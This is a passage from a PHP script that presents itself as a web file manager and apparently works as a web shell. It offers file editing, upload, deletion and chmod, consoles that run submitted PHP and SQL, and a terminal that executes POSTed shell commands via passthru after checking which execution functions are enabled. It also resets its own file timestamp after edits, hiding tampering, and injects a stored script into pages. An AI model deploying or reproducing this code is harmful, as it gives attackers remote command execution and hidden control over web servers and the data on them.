OH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC");
}
.file {
background-image: url("data:image/png;base64,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");
}
<?=fm_home_style()?>
.img {
background-image:
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
table{display:block;}
#fm_table td{display:inline;float:left;}
#fm_table tbody td:first-child{width:100%;padding:0;}
#fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
#fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
#fm_table tr{display:block;float:left;clear:left;width:100%;}
#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
$res = empty($_POST['sql']) ? '' : $_POST['sql'];
$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
$res = empty($_POST['php']) ? '' : $_POST['php'];
$res_lng = 'php';
}
if (isset($_GET['fm_settings'])) {
echo '
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
die($proxy_form);
} elseif (isset($res_lng)) {
?>
<table class="whole">
<tr>
<th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
<td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
else echo '</h2></td><td>'.fm_run_input('sql');
?></td></tr></table></td>
</tr>
<tr>
<td class="row1">
<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
<form action="" method="POST" name="console">
<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
<input type="reset" value="<?=__('Reset')?>">
<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
$select .= '<option value="-1">' . __('Select') . "</option>\n";
foreach ($tmpl as $key=>$value){
$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
}
$select .= "</select>\n";
echo $select;
}
?>
</form>
</td>
</tr>
</table>
<?php
if (!empty($res)) {
$fun='fm_'.$res_lng;
echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
}
} elseif (!empty($_REQUEST['edit'])){
if(!empty($_REQUEST['save'])) {
$fn = $path . $_REQUEST['edit'];
$filemtime = filemtime($fn);
if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated');
else $msg_ntimes .= __('Error occurred');
if ($_GET['edit']==basename(__FILE__)) {
touch(__FILE__,1415116371);
} else {
if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
}
}
$oldcontent = @file_get_contents($path . $_REQUEST['edit']);
$editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
<th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
<td class="row1">
<?=$msg_ntimes?>
</td>
</tr>
<tr>
<td class="row1">
<?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post" action="<?=$editlink?>">
<textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
<input type="submit" name="save" value="<?=__('Submit')?>">
<input type="submit" name="cancel" value="<?=__('Cancel')?>">
</form>
</td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
if(!empty($_REQUEST['save'])) {
if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
$msg_ntimes .= (__('File updated'));
else $msg_ntimes .= (__('Error occurred'));
}
clearstatcache();
$oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
$link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
<th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
<td class="row1">
<?=$msg_ntimes?>
</td>
</tr>
<tr>
<td class="row1">
<a href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post" action="<?=$link?>">
<?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
<?php if (is_dir($path.$_REQUEST['rights'])) { ?>
<input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
<?php } ?>
<input type="submit" name="save" value="<?=__('Submit')?>">
</form>
</td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
if(!empty($_REQUEST['save'])) {
rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
$msg_ntimes .= (__('File updated'));
$_REQUEST['rename'] = $_REQUEST['newname'];
}
clearstatcache();
$link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
<th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
<td class="row1">
<?=$msg_ntimes?>
</td>
</tr>
<tr>
<td class="row1">
<a href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post" action="<?=$link?>">
<?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
<input type="submit" name="save" value="<?=__('Submit')?>">
</form>
</td>
</tr>
</table>
<?php
} else {
//quanxian gai bian hou xu yao xi tong chongqi
$msg_ntimes = '';
if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
if(!empty($_FILES['upload']['name'])){
$_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);
if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
$msg_ntimes .= __('Error occurred');
} else {
$msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name'];
}
}
} elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) {
$msg_ntimes .= __('Error occurred');
} else {
$msg_ntimes .= __('Deleted').' '.$_REQUEST['delete'];
}
} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
$msg_ntimes .= __('Error occurred');
} else {
$msg_ntimes .= __('Created').' '.$_REQUEST['dirname'];
}
} elseif(!empty($_POST['search_recursive'])) {
ini_set('max_execution_time', '0');
$search_data = find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']);
if(!empty($search_data)) {
$msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>';
foreach ($search_data as $filename) {
$msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> ';
}
} else {
$msg_ntimes .= __('Nothing founded');
}
} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {
$msg_ntimes .= __('Error occurred');
} else {
fclose($fp);
$msg_ntimes .= __('Created').' '.$_REQUEST['filename'];
}
} elseif (isset($_GET['zip'])) {
$source = base64_decode($_GET['zip']);
$destination = basename($source).'.zip';
set_time_limit(0);
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
if (is_file($destination))
$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
'. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
.' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');
} elseif (isset($_GET['gz'])) {
$source = base64_decode($_GET['gz']);
$archive = $source.'.tar';
$destination = basename($source).'.tar';
if (is_file($archive)) unlink($archive);
if (is_file($archive.'.gz')) unlink($archive.'.gz');
clearstatcache();
set_time_limit(0);
//die();
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
$phar->compress(Phar::GZ,'.tar.gz');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.'.gz')) {
unlink($archive);
$destination .= '.gz';
}
$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
'. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
.' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
} else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');
} elseif (isset($_GET['decompress'])) {
// $source = base64_decode($_GET['decompress']);
// $destination = basename($source);
// $ext = end(explode(".", $destination));
// if ($ext=='zip' OR $ext=='gz') {
// $phar = new PharData($source);
// $phar->decompress();
// $base_file = str_replace('.'.$ext,'',$destination);
// $ext = end(explode(".", $base_file));
// if ($ext=='tar'){
// $phar = new PharData($base_file);
// $phar->extractTo(dir($source));
// }
// }
// $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
} elseif (isset($_GET['gzfile'])) {
$source = base64_decode($_GET['gzfile']);
$archive = $source.'.tar';
$destination = basename($source).'.tar';
if (is_file($archive)) unlink($archive);
if (is_file($archive.'.gz')) unlink($archive.'.gz');
set_time_limit(0);
//echo $destination;
$ext_arr = explode('.',basename($source));
if (isset($ext_arr[1])) {
unset($ext_arr[0]);
$ext=implode('.',$ext_arr);
}
$phar = new PharData($destination);
$phar->addFile($source);
$phar->compress(Phar::GZ,$ext.'.tar.gz');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.'.gz')) {
unlink($archive);
$destination .= '.gz';
}
$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
'. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
.' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
} else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');
}
?>
<table class="whole" id="header_table" >
<tr>
<th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg_ntimes)){ ?>
<tr>
<td colspan="2" class="row2"><?=$msg_ntimes?></td>
</tr>
<?php } ?>
<tr>
<td class="row2">
<table>
<tr>
<td>
<?=fm_home()?>
</td>
<td>
<?php
session_start();
// List of command execution functions to check
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen', 'symlink', 'dl'];
// Check if any of the functions are enabled (not disabled by disable_functions)
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}
if (!isset($_SESSION['cwd'])) {
$_SESSION['cwd'] = getcwd();
}
// Update cwd from POST if valid directory
if (isset($_POST['path']) && is_dir($_POST['path'])) {
$_SESSION['cwd'] = realpath($_POST['path']);
}
$cwd = $_SESSION['cwd'];
$output = "";
if (isset($_POST['terminal'])) {
$cmdInput = trim($_POST['terminal-text']);
if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
$dir = trim($matches[1]);
if ($dir === '' || $dir === '~') {
$dir = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $cwd;
} elseif ($dir[0] !== DIRECTORY_SEPARATOR && $dir[0] !== '/' && $dir[0] !== '\\') {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}
$realDir = realpath($dir);
if ($realDir && is_dir($realDir)) {
$_SESSION['cwd'] = $realDir;
$cwd = $realDir;
$output = "Changed directory to " . htmlspecialchars($realDir);
} else {
$output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
}
} else {
if ($canExecute) {
chdir($cwd);
$cmd = $cmdInput . " 2>&1";
if (function_exists('passthru')) {
ob_start();
passthru($cmd);
